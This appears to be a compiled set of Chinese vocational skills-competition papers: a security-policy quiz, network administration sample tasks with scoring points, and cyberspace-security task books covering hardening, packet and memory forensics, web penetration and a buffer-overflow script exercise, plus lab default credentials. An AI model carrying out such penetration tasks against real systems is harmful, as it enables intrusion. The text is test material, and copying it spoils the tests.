网络安全技能大赛试题及答案网络安全知识竞赛试题【1-10】1、国际电信联盟将每年的5月17日确立为世界电信日,今年已经是第38届。
今年世界电信日的主题为。
A、“让全球网络更安全”B、“信息通信技术:实现可持续发展的途径”C、“行动起来创建公平的信息社会”2、信息产业部将以世界电信日主题纪念活动为契机,广泛进行宣传和引导,进一步增强电信行业和全社会的意识。
A、国家安全B、网络与信息安全C、公共安全3、为了进一步净化网络环境,倡导网络文明,信息产业部于2006年2月21日启动了持续到年底的系列活动。
A、阳光绿色网络工程B、绿色网络行动C、网络犯罪专项整治4、“阳光绿色网络工程”的“阳光”寓意着光明和普惠万事万物,并要涤荡网络上的污浊;“绿色”代表要面向未来构建充满生机的和谐网络环境;“网络”代表活动的主要内容以网络信息服务为主;“工程”代表活动的系统性和长期性。
系列活动的副主题为:倡导网络文明,。
A、构建和谐环境B、打击网络犯罪C、清除网络垃圾5、为了规范互联网电子邮件服务,依法治理垃圾电子邮件问题,保障互联网电子邮件用户的合法权益,信息产业部于2006年2月20日颁布了,自2006年3月30日开始施行。
A、《互联网信息服务管理办法》B、《互联网电子邮件服务管理办法》C、《互联网电子公告服务管理规定》6、为了防范垃圾电子邮件,互联网电子邮件服务提供者应当按照信息产业部制定的技术标准建设互联网电子邮件服务系统,电子邮件服务器匿名转发功能。
A、使用B、开启C、关闭7、互联网电子邮件服务提供者对用户的和互联网电子邮件地址负有保密的义务。
A、个人注册信息B、收入信息C、所在单位的信息8、向他人发送包含商业广告内容的互联网电子邮件时,应当在电子邮件标题的前部注明字样。
A、“推销”B、“商业信函”C、“广告”或“AD”9、任何组织或个人不得利用互联网电子邮件从事传播淫秽色情信息、窃取他人信息或者等违法犯罪活动,否则构成犯罪的,依法追究刑事责任,尚不构成犯罪的,由公安机关等依照有关法律、行政法规的规定予以处罚;电信业务提供者从事上述活动的,并由电信管理机构依据有关行政法规处罚。
2020年全国职业院校技能大赛:网络系统管理项目(模块C)样卷1
2020年全国职业院校技能大赛改革试点赛“网络系统管理”赛项“网络构建”模块(样卷1)全国职业院校技能大赛执委会.技术专家组2020年9月目录一.说明 (3)二.项目背景 (3)三.项目规划和设计 (4)四.网络项目实施 (13)(一)设备基础信息配置与验证 (13)(二)网络搭建与网络冗余备份方案部署 (14)(三)移动互联网搭建与无线网络优化 (19)(四)实施出口安全防护与远程接入 (21)五.无线网络规划与实施 (22)(一)无线网络业务背景及需求介绍 (22)(二)无线网络中的业务规划 (25)六.提交竞赛结果文件说明 (28)一.说明本模块比赛时间为4小时。
请合理分配竞赛时间。
请仔细阅读以下要求。
1. 比赛时间结束时,请将工作站保持运行状态,评分过程需要在运行状态进行,不允许重启。
由于重启造成配置丢失由考生个人负责。
2. 为了方便测试,全网允许ICMP流量通行,请将操作系统的防火墙配置为允许Ping状态。
3.默认密码:XXXXXX。
4.软件&工具:见“2020年全国职业院校技能大赛改革试点赛赛项规程”。
二.项目背景陕西招财银行是一家地方性商业银行,创建于1985年,其省行(一级行)位于陕西省西安市,在全省各地市均建有二级行,各区县建立的支行及网点已超过150个。
随着省行的网络扁平化改造,所有的二级行、支行及网点均需要直接连接到省行,其网络运行及维护的效率也得到了极大的提升。
为了保证网络的稳定且方便维护,省行网络分为核心区、业务区、互联区、外联区四个部分。
其中:核心区作为全网的中心枢纽承担了各类业务数据流量的转发工作。
业务区分别通过有线和无线网络,为生产数据流(存/取款等相关数据)和办公数据流(OA、视频会议等与钱无关的数据)提供了服务。
互联区通过MSTP专线连接总行、全省所有的二级行、支行及网点。
外联区通过互联网向用户提供如网上银行等线上服务,并对接第三方公司并提供相关服务;同时,省行的办公人员也能通过外联区访问Internet。
2020年全国职业院校技能大赛:高职组网络系统管理项目-模块A--样题(三)及参考答案和评分要点
2020年全国职业院校技能大赛改革试点赛网络系统管理(样题三)模块A:Linux环境全国职业院校技能大赛执委会.技术专家组2020年09月目录一、竞赛介绍 (3)1.登录 (3)2.系统配置 (3)3.竞赛环境 (3)二、竞赛时间 (3)三、竞赛注意事项 (4)四、竞赛结果文件的提交 (4)五、项目任务描述 (5)1.拓扑图 (5)2.基本配置 (6)3.任务需求 (6)CLIENT TASK (6)RSERVER TASK (7)SERVER01 TASK (8)SERVER02 TASK (10)SERVER03 TASK (12)SERVER04 TASK (13)一、竞赛介绍比赛规定开始时间和结束时间,请合理分配您的时间。
请仔细阅读以下要求!比赛时间结束时,请将您工作站保持运行状态,评分会在您保持的运行状态进行。
不允许重新启动,关机的机器不会再启动。
以下信息请用于所有服务器和客户端:1.登录Username: rootPassword: ChinaSkill20!Username: Chinaskill20Password: Chinaskill20!注:若非特别指定,所有账号的密码均为 Chinaskill20!2.系统配置Region: ChinaLocale: English US (UTF-8)Key Map: English US当任务是配置SSL或者TLS,如要求隐藏所有警告,请小心执行。
3.竞赛环境物理机 (HOST):文件夹路径:虚拟机:[datastore1](VMware ESXI)ISO 镜像:[DATA]ISO/(VMware ESXI)软件:D:\软件 (Host)二、竞赛时间竞赛时间为4小时。
三、竞赛注意事项1. 竞赛所需的硬件、软件和辅助工具由组委会统一布置,选手不得私自携带任何软件、移动存储、辅助工具、移动通信等进入赛场。
2. 请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。
全国职业院校技能大赛中职组“网络空间安全”赛卷
2019年全国职业院校技能大赛中职组“网络空间安全”赛卷八一、竞赛阶段二、拓扑图PC机环境:物理机:Windows7;虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:123456),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali1.0(用户名:root;密码:toor);虚拟机3:Kali2.0(用户名:root;密码:toor);虚拟机4:WindowsXP(用户名:administrator;密码:123456)。
三、竞赛任务书(一)第一阶段任务书(700分)任务1. Wireshark数据包分析(100分)任务环境说明:✓服务器场景:PYsystem20191✓服务器场景操作系统:Windows(版本不详)1.使用Wireshark查看并分析PYsystem20191桌面下的capture4.pcap 数据包文件,找出黑客获取到的可成功登录目标服务器FTP的账号密码,并将黑客获取到的账号密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;(9分)2.继续分析数据包capture4.pcap,找出黑客使用获取到的账号密码登录FTP的时间,并将黑客登录FTP的时间作为Flag值(例如:14:22:08)提交;(13分)3.继续分析数据包capture4.pcap,找出黑客连接FTP服务器时获取到的FTP服务版本号,并将获取到的FTP服务版本号作为Flag值提交;(15分)4.继续分析数据包capture4.pcap,找出黑客成功登录FTP服务器后执行的第一条命令,并将执行的命令作为Flag值提交;(11分)5.继续分析数据包capture4.pcap,找出黑客成功登录FTP服务器后下载的关键文件,并将下载的文件名称作为Flag值提交;(13分)6.继续分析数据包capture4.pcap,找出黑客暴力破解目标服务器Telnet服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交;(9分)7.继续分析数据包capture4.pcap,找出黑客在服务器网站根目录下添加的文件,并将该文件的文件名称作为Flag值提交;(13分)8.继续分析数据包capture4.pcap,找出黑客在服务器系统中添加的用户,并将添加的用户名与密码作为Flag值(用户名与密码之间以英文逗号分隔,例如:root,toor)提交。
2020年全国职业院校技能大赛:网络系统管理项目-模块A--样题(三)评分要点
SERVER01 TASK
评分要点
分值
评分
WORK:主机名、IP地址和域名正确各得1分。
3分
2.RAID5:1.添加磁盘(1分);2.创建RAID5和LVM(4分);3 .自动挂载文件系统(1分)
6分
3.DNS(bind):1.查询并成功安装bind服务文件(4分);2.按要求创建区域和主机记录,创建配置文件(12分);3.测试DNS服务(4分)
20分
4.webserver(apache):1.成功安装apache服务文件(5分);2.正确建立站点(5分);3.申请CA证书(5分);4.访问https时应无浏览器安全警告信息(5分;5.使用http访问时自动跳转到https安全连接(5分);6.使用或自动跳转到。(5分)
20分
SERVER03 TASK
评分要点
分值
评分
WORK:正确显示主机名、IP地址和域名正确各得1分
3分
2.chrony:1.正确安装chrony服务文件,并测试正确(2分);2.按要求配置时间同步服务器(2分);3.测试时间同步服务器正确(2分)
6分
3.SSH:1正确安装SSH服务,并启动成功(2分);2.正确配置配置文件(2分);3.功能测试成功(2分)
6分
3.Squid:1.服务启动成功(2分);2.正确配置代理网络(2分);3.正确配置squid客户端,并实现各子网正常通信(2分)
6分
4.DHCP:1.正确安装DHCP服务包,并启动成功(1分);2.正确配置DHCP地址池、DNS和网关(3分);3.DHCP客户端测试,获取正确地址IP/dns/gw地址(6分)
30分
5.SSH:1.正确安装SSH服务,并启动成功(2分);2.正确配置配置文件(2分);3.功能测试成功(2分)
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
2020年全国职业院校技能大赛改革试点赛(中职组)网络安全竞赛试题(三)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF 夺旗-防御等四个模块。
根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。
竞赛时间安排和分值权重见表1。
表1 竞赛时间安排与分值权重二、竞赛注意事项1.比赛期间禁止携带和使用移动存储设备、计算器、通信工具及参考资料。
2.请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。
3.在进行任何操作之前,请阅读每个部分的所有任务。
各任务之间可能存在一定关联。
4.操作过程中需要及时按照答题要求保存相关结果。
比赛结束后,所有设备保持运行状态,评判以最后提交的成果为最终依据。
5.比赛完成后,比赛设备、软件和赛题请保留在座位上,禁止将比赛所用的所有物品(包括试卷等)带离赛场。
6.禁止在提交资料上填写与竞赛无关的标记,如违反规定,可视为0分。
竞赛内容模块A 基础设施设置与安全加固(本模块20分)一、项目和任务描述:假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、数据库安全策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。
本模块要求对具体任务的操作截图并加以相应的文字说明,以word文档的形式书写,以PDF格式保存,以赛位号作为文件名.二、服务器环境说明IDS:入侵检测系统服务器(Snort),操作系统为LinuxLOG:日志服务器(Splunk),操作系统为LinuxWeb:IIS服务器,操作系统为WindowsData:数据库服务器(Mysql),操作系统为Linux三、具体任务(每个任务得分以电子答题卡为准)A-1任务一登录安全加固请对服务器Log、Web、Data 按要求进行相应的设置,提高服务器的安全性。
1.密码策略(Log,Web,Data)a. 最小密码长度不少于8个字符;b. 密码策略必须同时满足大小写字母、数字、特殊字符。
2. 登录策略(Log,Web,Data)a.在用户登录系统时,应该有“For authorized users only”提示信息;b.一分钟内仅允许5次登录失败的尝试,超过5次,登录帐号锁定1分钟;c.远程用户非活动会话连接超时应小于等于5分钟。
3. 用户安全管理(Web)a.对服务器进行远程管理安全性SSL加固,防止敏感信息泄露被监听;b.查找并删除服务器中可能存在的帐号hacker;c.普通用户进行最小权限管理,对关闭系统仅限管理员帐号。
A-2任务二数据库加固(Data)1.以普通帐户MySql安全运行MySql,禁止MySql以管理员帐号权限运行;2.删除默认数据库(test);3.改变默认MySql管理员用户为:SuperRoot;4.使用MySql内置MD5加密函数加密用户user1的密码为(P@ssw0rd1!);5.赋予user1用户对数据库所有表只有select,insert,delete,update权限;6. 对忘记mysql数据库SuperRoot管理员密码进行重置操作;7.禁用LOCAL INFILE命令防止非授权用户访问本地文件;8.为防止数据库操作信息泄露,请禁止使用MySql命令行历史记录;9.为了分析数据库运行过程中的一些异常活动,请开启MySql二进制日志。
A-3任务三 Web安全加固(Web)1.为了防止web中.mdb数据库文件非法下载,请对Web配置文件进行安全加固;2.限制目录执行权限,对picture和upload目录设置执行权限为无;3.开启IIS的日志审计记录(日志文件保存格式为W3C,只记录日期、时间、客户端IP地址、用户名、方法);4.为了减轻网站负载,设置网站最大并发连接数为1000;5.防止文件枚举漏洞枚举网络服务器根目录文件,禁止IIS短文件名泄露;6.关闭IIS的WebDAV功能增强网站的安全性。
A-4任务四流量完整性保护(Web,Data)1.对Web网站进行HTTP重定向HTTPS设置,仅使用HTTPS协议访问网站(Web)(注证书颁发给 并通过https://访问Web网站);2.为了防止密码在登录或者传输信息中被窃取,仅使用证书登录SSH(Data)。
A-5任务五事件监控(Web)1.将Web服务器开启审核策略登录事件成功/失败;特权使用成功;策略更改成功/失败;进程跟踪成功/失败;2.配置splunk接收Web服务器,安全日志,系统日志,CPU负载,内存,磁盘空间,网络状态。
A-6任务六服务加固ssh\vsFTPd (Data)1.修改ssh服务端口为2222;2.ssh禁止ROOT用户远程登录;3.vsFTPd禁止匿名用户上传;4.激活vsFTPd上传下载日志;5.vsFTPd同一个IP只能连接两个;6.vsFTPd将使客户端连接时的端口范围在50000和60000之间;7.vsFTPd使本地用户登录活动范围限制在home目录。
A-7任务七防火墙策略所有服务器开启防火墙,为防止勒索病毒攻击对防火墙进行加固策略:1.Windows系统禁用445端口;2.Linux系统禁用23端口;3.Linux系统禁止别人ping通;4.Linux系统为确保安全禁止所有人连接ssh除了192.168.1.1这个ip。
模块B 网络安全事件响应、数字取证调查和应用安全(本模块40分,每个子任务4分)一、项目和任务描述:假定你是某网络安全技术支持团队成员,某企业的服务器系统被黑客攻击,你的团队前来帮助企业进行调查并追踪本次网络攻击的源头,分析黑客的攻击方式,发现系统漏洞,提交网络安全事件响应报告,修复系统漏洞,删除黑客在系统中创建的后门,并帮助系统恢复正常运行。
二、服务器环境参考(以实际赛题为准)操作系统:Windows/Linux三、PC机环境参考(以实际赛题为准)物理机:Windows7或Windows10;虚拟机1:Ubuntu Linux(用户名:root;密码:123456),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali1.0(用户名:root;密码:123456);虚拟机3:Kali2.0(用户名:root;密码:123456);虚拟机4:WindowsXP(用户名:administrator;密码:123456)。
四、具体任务任务说明:flag格式:flag{Xxxx123},括号中的内容作为flag 值,提交Xxxx123即可B-1任务一:应急响应*任务说明:Server1用户名:administraotr,密码:1234561.分析注册表,将黑客添加的启动项字符串作为flag值提交;2.检查系统的常规启动项,将黑客设置的自启动恶意程序文件名作为flag值提交;3.清除操作系统上存在漏洞的应用程序,将该应用程序所在的路径作为flag值提交;4.在命令行界面中清除隐藏的管理员用户,将隐藏的管理员账户名称作为flag值提交;5.清除黑客在系统上添加的Webshell木马,将连接木马的密码作为flag提交。
B-2任务二:内存取证*任务说明:仅能获取Server2的IP地址1.从内存中获取到用户admin的密码并且破解密码,以flag{admin,password}形式提交(密码为6位);2.获取当前系统ip地址及主机名,以flag{ip:主机名}形式提交;3.获取当前系统浏览器搜索过的关键词,作为flag提交;4.桌面上有一个flag文件,请获取flag文件中的内容;5.当前系统中存在挖矿进程,请获取指向的矿池地址,以flag{ip:端口}形式提交;6.恶意进程在系统中注册了服务,请将服务名以flag{服务名}形式提交。
B-3任务三:Python代码分析*任务说明:仅能获取Server3的IP地址,在Server3服务器桌面找到flag.py文件并完成以下任务。
1.完善文件flag.py文件,填写该文件当中空缺的flag1字符串,并将改字符串作为flag提交;2.完善文件flag.py文件,填写该文件当中空缺的flag2字符串,并将改字符串作为flag提交;3.完善文件flag.py文件,填写该文件当中空缺的flag3字符串,并将改字符串作为flag提交;4.完善文件flag.py文件,填写该文件当中空缺的flag4字符串,并将改字符串作为flag提交;5.将完善好的文件执行,将执行成功后的回显内容作为flag值提交。
B-4任务四:Web渗透测试*任务说明:仅能获取Server4的IP地址1.获取PHP的版本号作为flag值提交;(例如:5.2.14)2.获取MySQL数据库的版本号作为flag值提交;(例如:5.0.22)3.获取系统的内核版本号作为flag值提交;(例如:2.6.18)4.获取网站后台管理员admin用户的密码作为flag值提交;5.找到/root目录中的txt文件,将文件内容作为flag值提交。
B-5任务五:STEGA信息隐藏*任务说明:Server5用户名:administrator,密码:1234561.找出文件夹1中的文件,将文件中的隐藏信息作为flag值提交;2.找出文件夹2中的文件,将文件中的隐藏信息作为flag值提交;3.找出文件夹3中的文件,将文件中的隐藏信息作为flag值提交;4.找出文件夹4中的文件,将文件中的隐藏信息作为flag值提交;5.找出文件夹5中的文件,将文件中的隐藏信息作为flag值提交。
B-6任务六:缓冲区溢出渗透测试*任务说明:仅能获取Server6的IP地址,FTP服务器用户名:admin,密码:1234561.从靶机服务器场景FTP服务器中下载文件BO.py,编辑该Python程序文件,使该程序实现对Server11进行缓冲区溢出渗透测试的功能,填写该文件当中空缺的F1字符串,将该字符串作为flag 值提交;2.继续编辑命名为BO.py的Python程序文件,使该程序实现对Server6进行缓冲区溢出渗透测试的功能,填写该文件当中空缺的F2。